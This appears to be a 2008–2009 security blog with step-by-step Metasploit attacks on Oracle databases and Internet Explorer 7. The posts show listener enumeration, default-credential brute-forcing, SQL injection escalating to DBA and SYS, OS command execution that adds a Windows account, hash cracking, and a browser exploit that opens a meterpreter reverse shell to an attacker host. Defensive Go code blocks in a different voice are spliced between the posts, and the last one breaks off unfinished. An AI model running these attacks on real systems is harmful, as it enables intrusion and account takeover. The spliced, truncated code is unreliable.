
Saturday, January 10, 2009

Oracle Sid Enumeration Metasploit Auxiliary Module

I recently pushed out (again with MC's help) an Oracle SID enumeration MSF auxiliary module for Oracle versions earlier than 10g Release 2. Starting with 10g Release 2 the TNS listener is protected and won't just cough up the SID for free; you'll have to guess it or brute force it (hopefully the SID guess module will come soon).

Here it is in action:

msf > use auxiliary/admin/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 1521 yes The target port

Description:
This module simply queries the TNS listner for the Oracle SID. With
10g Release 2 and above the listener will be protected and the SID
will have to be bruteforced or guessed.

msf auxiliary(oracle_sid) > set RHOST 192.168.0.43
RHOST => 192.168.0.43
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.0.43: admin1
[*] Identified SID for 192.168.0.43: admin2
[*] Identified SID for 192.168.0.43: database
[*] Identified SID for 192.168.0.43: dba3
[*] Identified SID for 192.168.0.43: dba5
[*] Identified SID for 192.168.0.43: dba7
[*] Identified SERVICE_NAME for 192.168.0.43: admin1
[*] Identified SERVICE_NAME for 192.168.0.43: admin2
[*] Identified SERVICE_NAME for 192.168.0.43: database
[*] Identified SERVICE_NAME for 192.168.0.43: dba3
[*] Identified SERVICE_NAME for 192.168.0.43: dba5
[*] Identified SERVICE_NAME for 192.168.0.43: dba7
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

If it's protected you'll see this:

msf auxiliary(oracle_sid) > set RHOST 192.168.0.137
RHOST => 192.168.0.137
msf auxiliary(oracle_sid) > run

[-] TNS listener protected for 192.168.0.137...
[*] Auxiliary module execution completed


If you are on the MSF 3.3 trunk, an svn update should be all you need to do.

Wednesday, January 7, 2009

More Oracle Pwnage...I Lost Count...New Version Module

Thanks to help from MC, I pushed out an oracle_version scanner module today for MSF that uses MC's TNS mixin.

Here it is in action:

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration.
Version: $Revision$

Provided by:
CG

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build..

msf auxiliary(oracle_version) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(oracle_version) > run

[-] The connection timed out (192.168.0.0:1521).
[-] The connection timed out (192.168.0.1:1521).
[-] The connection timed out (192.168.0.2:1521).
[-] The connection timed out (192.168.0.3:1521).
[-] The connection timed out (192.168.0.4:1521).
[-] The connection timed out (192.168.0.5:1521).
[-] The connection timed out (192.168.0.6:1521).
[-] The connection timed out (192.168.0.7:1521).
[-] The connection was refused by the remote host (192.168.0.8:1521).
[-] The connection timed out (192.168.0.9:1521).
[-] The connection timed out (192.168.0.10:1521).
[-] The connection was refused by the remote host (192.168.0.11:1521).
[*] Host 192.168.0.12 is running: 32-bit Windows: Version 10.2.0.1.0 - Production
[-] The connection timed out (192.168.0.13:1521).
[*] Host 192.168.0.14 is running: Linux: Version 10.2.0.1.0 - Production
[-] The connection timed out (192.168.0.15:1521).
[-] The connection timed out (192.168.0.16:1521).

---SNIP---You get the idea---

If you are running the framework trunk, you can svn up and get the aux module as well as MC's 8i TNS overflow exploit.

Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a default user account, or an account with an easy-to-guess username/password, for Oracle and taking that user to DBA via SQL injection in Oracle packages.

I've been neglecting the blog a bit while porting some of the public SQLi for Oracle into metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point; I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, it being the week of Christmas (or whatever you celebrate), I thought I'd put out a module for a vulnerability that is public but has no exploit code out.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL>

select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g Release 1.

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.

Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time figuring it out. It's pretty straightforward though. If you want to know more about how it works, HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an initial PoC working but it was not stable and only triggered on XP, as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
msf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debugging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis


Sunday, November 23, 2008

Oracle Pwnage Part 5 -- Password Cracking with JTR

Thanks to dentonj for pointing out to me that there was an Oracle patch for John the Ripper.

I used the john from this site:
http://www.banquise.net/misc/patch-john.html
http://btb.banquise.net/bin/myjohn.tgz

cg@segfault:~/evil/john/run$ more oraclehashes
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D67

cg@segfault:~/evil/john/run$ ./john oraclehashes --wordlist=password.lst
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

cg@segfault:~/evil/john/run$ ./john --i oraclehashes
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...


Saturday, November 22, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 4

Thanks to MC for this one...

http://metasploit.com/users/mc/oracle9i/brute_login.rb

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module uses a list of well known authentication credentials for
bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >

Wednesday, November 19, 2008

Oracle Pwnage Part 3

Sorry, no metasploit for this one.

But

I did get asked how to get the SCOTT/TIGER username and pass. I left a (hint) in the first blog post. But by request here is the link:
http://www.petefinnigan.com/default/default_password_checker.htm

Second thing was that you may find yourself with some Oracle hashes after some crafty (well, not really) SQL queries. Something that probably looks like this:

[*] DBSNMP,E066D214D5421CCC
[*] SCOTT,F894844C34402B67
[*] XDB,88D8364765FCE6AF

There are a couple of crackers, but I like checkpwd from red-database security. http://www.red-database-security.com/software/checkpwd.html

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe DBSNMP:E066D214D5421CCC password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
DBSNMP has weak password DBSNMP

Done. Summary:
Passwords checked : 2
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe SCOTT:F894844C34402B67 password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
SCOTT has weak password TIGER

Done. Summary:
Passwords checked : 9
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 4.5

cg@segfault:~/Desktop/oracle_checkpwd_big$ wine checkpwd.exe XDB:88D8364765FCE6AF password_file.txt
Checkpwd 1.23 [Win] - (c) 2005-2007 by Red-Database-Security GmbH
Oracle Security Consulting, Security Audits & Security Trainings
http://www.red-database-security.com

opening weak password list file
reading weak passwords list
checking passwords
Starting 2 threads
XDB has weak password CHANGE_ON_INSTALL

Done. Summary:
Passwords checked : 3
Weak passwords found : 1
Elapsed time (min:sec) : 0:02
Passwords / second : 1.5
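The hashes cracked here and in Part 5 above are the pre-11g Oracle format: DES-CBC run twice over the uppercased username||password, which is why the username acts as the salt and why John warns that the hash type is case-insensitive. This added Go example (my code, not checkpwd or John) computes that hash and checks a constructed dump in the oracle_sql output format against a few documented defaults, the same check a DBA should run over DBA_USERS before anyone else does; it assumes ASCII credentials.

```go
package main

import (
	"crypto/cipher"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// Fixed first-stage DES key of the pre-11g Oracle password scheme.
var stageOneKey = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF}

// lastCBCBlock DES-CBC-encrypts data (whole blocks only) under key with a
// zero IV and returns just the final ciphertext block.
func lastCBCBlock(key, data []byte) ([]byte, error) {
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, make([]byte, des.BlockSize)).CryptBlocks(out, data)
	return out[len(out)-des.BlockSize:], nil
}

// LegacyOracleHash returns the 16-hex-digit value Oracle 7 through 10g stores
// in DBA_USERS.PASSWORD for user/pass (ASCII credentials only, by assumption).
func LegacyOracleHash(user, pass string) (string, error) {
	// 1. uppercase user||pass: the username is the salt, letter case is lost
	up := strings.ToUpper(user + pass)
	// 2. widen each character to two bytes with a zero high byte
	buf := make([]byte, 0, 2*len(up)+des.BlockSize)
	for i := 0; i < len(up); i++ {
		if up[i] > 0x7F {
			return "", fmt.Errorf("non-ASCII credentials are not handled here")
		}
		buf = append(buf, 0x00, up[i])
	}
	// 3. zero-pad to a whole number of DES blocks
	for len(buf)%des.BlockSize != 0 {
		buf = append(buf, 0x00)
	}
	// 4. first pass under the fixed key; its last block becomes the second key
	k2, err := lastCBCBlock(stageOneKey, buf)
	if err != nil {
		return "", err
	}
	// 5. second pass under the derived key; its last block is the stored hash
	h, err := lastCBCBlock(k2, buf)
	if err != nil {
		return "", err
	}
	return strings.ToUpper(hex.EncodeToString(h)), nil
}

// Constructed dump in the "USER,HASH" form the oracle_sql module printed above.
var dump = []string{
	"DBSNMP,E066D214D5421CCC",
	"SCOTT,F894844C34402B67",
	"XDB,88D8364765FCE6AF",
	"PROD,2E817F456CE5A4EC",
}

// Documented default credentials to test against; a real audit would load the
// full default-password list linked above.
var defaults = map[string][]string{
	"SCOTT":  {"TIGER"},
	"DBSNMP": {"DBSNMP"},
	"XDB":    {"CHANGE_ON_INSTALL"},
}

// FindDefaultPasswords maps each user whose stored hash equals the hash of a
// documented default password to that password.
func FindDefaultPasswords(lines []string, candidates map[string][]string) map[string]string {
	found := map[string]string{}
	for _, line := range lines {
		parts := strings.SplitN(strings.TrimSpace(line), ",", 2)
		if len(parts) != 2 {
			continue // malformed line: skip it rather than guess
		}
		user, stored := strings.ToUpper(parts[0]), strings.ToUpper(parts[1])
		for _, pw := range candidates[user] {
			if h, err := LegacyOracleHash(user, pw); err == nil && h == stored {
				found[user] = pw
				break
			}
		}
	}
	return found
}

func main() {
	for user, pw := range FindDefaultPasswords(dump, defaults) {
		fmt.Printf("%s still uses the default password %s\n", user, pw)
	}
}
```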

Monday, November 17, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 2

Last post we got to where we could execute SQL queries on the box and were able to see Scott's permissions.

Let's use the SQLI auxiliary modules to see if we can add the DBA privilege to Scott's account.

As you recall....

msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed

Let's try to escalate to DBA with the DBMS_EXPORT_EXTENSION exploit (auxiliary module)

msf auxiliary(oracle_sql) > back
msf > use auxiliary/sqli/oracle/
use auxiliary/sqli/oracle/ctxsys_driload
use auxiliary/sqli/oracle/dbms_export_extension
use auxiliary/sqli/oracle/dbms_metadata
use auxiliary/sqli/oracle/lt_findricset
use auxiliary/sqli/oracle/pitrig_truncate

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info

Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBA SCOTT no DB user to elevate to DBA.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >


Let's check...

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) >
**Same settings as before; check user's roles
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO <--New Privileges :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

Let's add Java privileges to the Scott account

msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
SQL => grant javasyspriv to SCOTT
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...
[*] Auxiliary module execution completed

Let's check to see if it worked:

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,DBA,NO,YES,NO
[*] SCOTT,JAVASYSPRIV,NO,YES,NO <-- Yup it worked :-)
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


From there we can use the oracle_win32 auxiliary module to execute commands
http://metasploit.com/users/mc/oracle9i/oracle_win32.rb

msf > use auxiliary/admin/oracle/oracle_win32
msf auxiliary(oracle_win32) > info

Name: Execute win32 OS commands
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt no The OS command to execute.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will create a java class which enables the execution of OS commands.

msf auxiliary(oracle_win32) > set CMD "net user dba P@ssW0rd1234 /add"
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(oracle_win32) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_win32) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dbaa P@ssW0rd1234 /add'
[*] Done...
[*] Auxiliary module execution completed

Or you can test that you are executing commands with ping:

msf auxiliary(oracle_win32) > set CMD "ping 192.168.100.50"
CMD => ping 192.168.100.50
msf auxiliary(oracle_win32) > run

[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'ping 192.168.100.50'
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_win32) >


On the other end, run tcpdump and filter for ICMP:

sudo tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
01:11:26.123515 IP 192.168.100.25 > 192.168.100.50: ICMP echo request, id 0, seq 8192, length 40
01:11:26.343528 IP 192.168.100.50 > 192.168.100.25: ICMP echo reply, id 0, seq 8192, length 40

---SNIP---

8 packets captured
8 packets received by filter
0 packets dropped by kernel


For the ninja shit, check out MC's demo text file.

**Issues: you can't see the output of your command, so you have to run things whose results you can observe some other way (see the demo text file).

If you care to clean up, just revoke your DBA privileges with the oracle_sql module:

"revoke dba from scott"
"revoke javasyspriv from scott"

That's it!

Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1

Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know that's "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here: http://metasploit.com/users/mc/

We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run

[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 - Production


Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >


Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.


msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed


WTF! No FTW on that one. A Google of the error (oracle 12514) hints at the Oracle instance not being set up correctly. Let's see if we can get some more info. Using tnscmd.pl (oldie but a goodie), let's see if we get some additional information using the status command:

cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,.........@
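The oracle_sid module above and this status reply both rely on the listener describing itself in nested (KEY=VALUE) groups. As an added example (my code, not the page's tools or Metasploit's), here is a small Go parser for that format, fed a reply constructed to mirror the output above; it pulls out the advertised SERVICE_NAME values and the SECURITY flag, which is what you would check on your own listeners, since SECURITY=OFF means no listener password is set and this inventory goes to anyone who can reach port 1521.

```go
package main

import (
	"fmt"
	"strings"
)

// Node is one (KEY=...) element: a leaf carries Value, a container Children.
type Node struct {
	Key      string
	Value    string
	Children []*Node
}

// Constructed reply modelled on the tnscmd.pl status output above, with the
// framing bytes shortened and the endpoints trimmed to one.
const sampleReply = "......6...S....(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)" +
	"(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(TRACING=off)(SNMP=OFF)(PID=1580))" +
	".5....(ENDPOINT=(HANDLER=(STA=ready)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxx.com)(PORT=8080))(Session=RAW)))),," +
	"(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),," +
	"(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,....@"

// parseDescriptors returns every top-level (KEY=...) group in a raw reply,
// skipping the TNS framing bytes and the ",," separators between groups.
func parseDescriptors(raw string) []*Node {
	var out []*Node
	for pos := 0; pos < len(raw); {
		if raw[pos] != '(' {
			pos++
			continue
		}
		n, next, ok := parseNode(raw, pos)
		if !ok {
			break // truncated or malformed group: keep what parsed so far
		}
		out = append(out, n)
		pos = next
	}
	return out
}

// parseNode parses the (KEY=...) whose '(' is at raw[pos]; returns the node and the index past its ')'.
func parseNode(raw string, pos int) (*Node, int, bool) {
	eq := strings.IndexByte(raw[pos:], '=')
	if eq < 0 {
		return nil, pos, false
	}
	n := &Node{Key: raw[pos+1 : pos+eq]}
	pos += eq + 1
	if pos < len(raw) && raw[pos] == '(' {
		// container: nested (KEY=...) children up to the closing ')'
		for pos < len(raw) && raw[pos] == '(' {
			child, next, ok := parseNode(raw, pos)
			if !ok {
				return nil, pos, false
			}
			n.Children = append(n.Children, child)
			pos = next
		}
	} else {
		// leaf: the value runs to the next ')' (values carry no parentheses)
		end := strings.IndexByte(raw[pos:], ')')
		if end < 0 {
			return nil, pos, false
		}
		n.Value = raw[pos : pos+end]
		pos += end
	}
	if pos >= len(raw) || raw[pos] != ')' {
		return nil, pos, false
	}
	return n, pos + 1, true
}

// findAll walks the tree depth-first and returns every node with the key.
func findAll(nodes []*Node, key string) []*Node {
	var hits []*Node
	for _, n := range nodes {
		if n.Key == key {
			hits = append(hits, n)
		}
		hits = append(hits, findAll(n.Children, key)...)
	}
	return hits
}

// ServiceNames lists the advertised SERVICE_NAME values (what oracle_sid prints).
func ServiceNames(raw string) []string {
	var names []string
	for _, n := range findAll(parseDescriptors(raw), "SERVICE_NAME") {
		names = append(names, n.Value)
	}
	return names
}

func main() {
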